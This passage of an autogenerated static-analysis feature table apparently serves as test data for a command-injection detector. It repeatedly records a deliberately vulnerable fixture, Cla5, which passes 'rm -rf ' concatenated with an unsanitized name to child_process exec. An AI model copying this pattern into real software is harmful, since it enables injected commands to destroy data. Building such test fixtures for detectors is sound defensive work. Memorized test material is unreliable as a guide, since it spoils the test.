name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | exceptional return of cp.exec ... + name) | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:2:144:26 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:5:144:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:5:144:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:5:144:8 | exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:5:144:8 | exec | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:5:144:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:18 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:18 | "rm -rf " | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:18 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:25 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:25 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:25 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:25 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:25 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:25 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:25 | "rm -rf " + name | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:25 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:10:144:25 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:22:144:25 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:22:144:25 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:22:144:25 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:22:144:25 | name | enclosingFunctionName | Cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:22:144:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:144:22:144:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:19 | module.exports.cla5 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:19 | module.exports.cla5 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:19 | module.exports.cla5 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:32 | module. ... Cla5() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:32 | module. ... Cla5() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:1:146:32 | module. ... Cla5() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:8:146:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:8:146:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:8:146:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:16:146:19 | cla5 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:16:146:19 | cla5 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:16:146:19 | cla5 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:23:146:32 | exceptional return of new Cla5() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:23:146:32 | exceptional return of new Cla5() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:23:146:32 | exceptional return of new Cla5() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:23:146:32 | new Cla5() | assignedToPropName | cla5 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:23:146:32 | new Cla5() | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:23:146:32 | new Cla5() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:23:146:32 | new Cla5() | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:27:146:30 | Cla5 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:27:146:30 | Cla5 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:146:27:146:30 | Cla5 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:148:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:148:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:148:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:148:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:148:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:148:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:148:23 | module. ... ndirect | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:148:23 | module. ... ndirect | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:148:1:148:23 | module. ... ndirect | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 